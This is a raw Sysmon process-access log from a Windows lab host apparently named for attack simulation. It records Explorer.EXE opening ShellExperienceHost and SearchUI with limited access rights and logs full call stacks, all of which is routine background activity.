12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\combase.dll+567e1|C:\Windows\System32\combase.dll+56e0d 10341000x80000000000000006502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6d1f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+68be|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6966|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6ab5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+83c5|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7b9c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7b3b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8749|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ae6|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565848C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000006495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d4e3|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d7a9|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12a3cc|C:\Windows\System32\TwinUI.dll+b60d4|C:\Windows\System32\TwinUI.dll+b1e1b|C:\Windows\System32\TwinUI.dll+d206a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000006484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.122{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 